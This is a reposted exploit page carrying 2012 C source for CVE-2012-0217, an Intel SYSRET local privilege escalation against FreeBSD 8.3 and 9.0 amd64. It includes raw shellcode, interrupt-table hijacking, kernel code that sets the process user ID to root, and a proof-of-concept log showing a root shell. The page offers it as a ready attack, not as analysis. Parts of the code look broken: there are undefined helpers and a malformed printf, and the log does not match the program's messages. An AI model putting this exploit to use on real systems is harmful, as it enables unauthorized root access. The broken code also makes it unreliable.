Intel SYSRET FreeBSD Privilege Escalation Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容
Intel SYSRET FreeBSD Privilege Escalation Exploit
来源：www.r00tw0rm.com 作者：r00tw0rm 发布时间：2012-07-17
/*

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               Private 1337day exploit by Inj3ct0r team               1
1               #########################################              0
0                                                                      1
1                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


#
# Name      : Intel SYSRET FreeBSD Privilege Escalation Exploit
# Date      : july, 16 2012
# Platform  : freebsd
# Type      : local exploit
# Web       : www.r00tw0rm.com | www.1337day.com
# Tested on : FreeBSD 8.3-RELEASE amd64, FreeBSD 9.0-RELEASE amd64
# Greetz :  r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
#                      Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com)


PoC testing .:
satsura@0xr00tw0rm ~/Р/exploit_dev> uname -irspm
FreeBSD 9.0-RELEASE amd64 amd64 GENERIC
satsura@0xr00tw0rm ~/Р/exploit_dev> id
uid=1001(satsura) gid=1001(satsura) группы=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),29(audio),30(dip),44(video),46(plugdev),104(fuse),105(lpadmin),112(netdev),119(admin),126(sambashare),1001(satsura)
satsura@0xr00tw0rm ~/Р/exploit_dev> ./CVE-2012-0217 
[!] Running CVE-2012-0217
[+] Checking OS bit mmap()
[+] Fill with NOP (0x90) last mem page
[+] Final Stage
[+] w00t! w00t! r0073d! xDDDD
root@0xr00tw0rm:~/Рабочий стол/exploit_dev# id
uid=0(root) gid=0(root) группы=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),29(audio),30(dip),44(video),46(plugdev),104(fuse),105(lpadmin),112(netdev),119(admin),126(sambashare),1001(satsura)
root@0xr00tw0rm:~/Рабочий стол/exploit_dev# 


*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>

#include <sys/ucred.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/proc.h>
#include <sys/param.h>
#include <sys/linker.h>

#include <machine/cpufunc.h>
#include <machine/segments.h>
#include <machine/intr_machdep.h>

#define _WANT_UCRED
#define BSS 0
#define STATIC_OFFSET 0x250

struct gate_descriptor *gt;
void *uaddr, *ustack;

unsigned char evilcode[] = 
  "\x48\xb8\x18\x00\x00\x00\x00\x00\x00\x00" 
  "\x48\xba\x00\x00\x20\x00\x00\x8e\x00\x00" // hijack of the handler PF at 0x00000000ZZZZXXXX
  "\x48\xbc\xb0\x41\x18\x81\xff\xff\xff\xff" 
  "\x0f\x05"; 	 			                 // syscall 

int validate_target(char * sysname, char * release, char * machine)
{
    validtarget_t targets[] = {
        { "FreeBSD", "8.3-RELEASE", "amd64" },
        { "FreeBSD", "9.0-RELEASE", "amd64" },
        { 0, 0, 0 }
    };

    int found = 0;
    int i = 0;

    while (!found && targets[i].sysname) {
        found = !strcmp(targets[i].sysname, sysname)
            && !strcmp(targets[i].release, release)
            && !strcmp(targets[i].machine, machine);
        ++i;
    }
    return found;
}

int is_intel()
{
    char cpu_vendor[13];

    get_cpu_vendor(cpu_vendor);
    return !strcmp(cpu_vendor, "GenuineIntel");
}

struct restore_entry {
	u_char idx;
	u_char dpl;
	void *addr;
	u_char name[10];
} entries[]  = {{ 0, 	  0, NULL, "idt0" },
		{ 0,  	  0, NULL, "Xrsvd"},
		{ IDT_DE, 0, NULL, "Xdiv" },
		{ IDT_DB, 0, NULL, "Xdbg" },
		{ IDT_NMI,2, NULL, "Xnmi" },
		{ IDT_BP, 0, NULL, "Xbpt" },
		{ IDT_OF, 0, NULL, "Xofl" }, 
		{ IDT_BR, 0, NULL, "Xbnd" }, 
		{ IDT_UD, 0, NULL, "Xill" },
		{ IDT_NM, 0, NULL, "Xdna" },
		{ IDT_DF, 1, NULL, "Xdblfault" },
		{ IDT_FPUGP, 0, NULL, "Xfpusegm" },
		{ IDT_TS, 0, NULL, "Xtss" },
		{ IDT_NP, 0, NULL, "Xmissing" },
		{ IDT_SS, 0, NULL, "Xstk"  },
		{ IDT_GP, 0, NULL, "Xprot" },
		{ IDT_PF, 0, NULL, "Xpage" },
		{ IDT_MF, 0, NULL, "Xfpu"  },
		{ IDT_AC, 0, NULL, "Xalign"},
		{ IDT_MC, 0, NULL, "Xmchk" },
		{ IDT_XF, 0, NULL, "Xxmm"  }};

void *
resolve_addr(char *func, int section)
{
	u_int64_t addr;
	char cmd[128];
	snprintf(cmd, sizeof(cmd) - 1, "objdump -j %s -x /boot/kernel/kernel | grep %s", (section == BSS) ? ".bss" : ".text", func); 
	
	FILE *fd = popen(cmd, "r");
	if(fd == NULL)
		return NULL;

	fread(cmd, sizeof(cmd), 1, fd);
	sscanf(cmd, "%lx %*s", &addr);

	return (void *)addr;	
}

void
exit_usermode(void)
{
	setenv("PS1", "Inj3ct0r> ", 1);
	system("/bin/bash");
	exit(0);
}

void
setidt(idx, func, typ, dpl, ist)
        int idx;
        void *func;
        int typ;
        int dpl;
        int ist;
{
	struct gate_descriptor *ip;

        ip = gt + idx;
        ip->gd_looffset = (uintptr_t)func;
        ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
        ip->gd_ist = ist;
        ip->gd_xx = 0;
        ip->gd_type = typ;
        ip->gd_dpl = dpl;
        ip->gd_p = 1;
        ip->gd_hioffset = ((uintptr_t)func)>>16 ;
}

void
kernel_code(void)
{
        int x, i;
	struct thread *td;

	__asm("movq %r10, %rsp");	

        for(x = 0; x < 29; x ++) {
                setidt(x, (void *)entries[1].addr, SDT_SYSIGT, SEL_KPL, 0);
        }

        for(x = 2; x < sizeof(entries) / sizeof(struct restore_entry); x ++) {
                setidt(entries[x].idx, entries[x].addr, SDT_SYSIGT, SEL_KPL, entries[x].dpl);
        }
	
	asm volatile ( "swapgs\n" 
		       "movq %%gs:0, %0":"=r"(td) );
	
	td->td_proc->p_ucred->cr_uid = 0;
	
	
	asm volatile ("movq %0, %%rcx\n"
		      "movq %1, %%rsp\n"
		      "swapgs\n"
		      "sysretq"::"r"(uaddr),"r"(ustack)); 
}

int
main(int argc, char *argv[])
{
	int x, section_type = BSS;
	u_short high, low;
	u_int64_t kaddr;

	printf("[!] Running Exploit CVE2012-0217\n");
	printf("[+] Checking OSbit Map");
	void *maddr = mmap((void *)0x7ffffffff000, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON, -1, 0);
	if(maddr == MAP_FAILED) {
		perror("[-] Fuck! Error mmaped address\n");
		return -1;
	}
    printf("[+]Fill with NOP 0x90 and copy Evilcode\n");
	memset(maddr, 0x90, 0x1000);
	memcpy(maddr + 0x1000 - (sizeof(evilcode) - 1), evilcode, sizeof(evilcode) - 1);
	printf("[-] Resolve all addresses \n", );
	
        for(x = 0; x < sizeof(entries) / sizeof(struct restore_entry); x ++) {
                entries[x].addr = resolve_addr(entries[x].name, section_type);
                if(entries[x].addr == NULL) {
                        printf("[-] Can't resolve address for function %s\n", entries[x].name);
                        return -1;
                }
                if (x == 0) section_type ++;
        }

	gt = entries[0].addr;
	printf("[+] Final Stage \n");
	kaddr = (u_int64_t)&kernel_code;
	uaddr = &exit_usermode;
	__asm("movq %%rsp, %0" : "=m"(ustack));
	printf("[+] w00t! w00t! r0073d xDDDD\n");
	high = (kaddr >> 16);
	low  = (kaddr);

	char *ptr = (char *)0x800000000000 - 20;
	*(u_short *)ptr = low;
	ptr = (char *)0x800000000000 - 14;
	*(u_short *)ptr = high; 
	ptr = (char *)0x800000000000 - 10;
	*(u_int64_t *)ptr = (u_int64_t)((char *)gt + STATIC_OFFSET);

	(*(void(*)()) maddr)();
}
[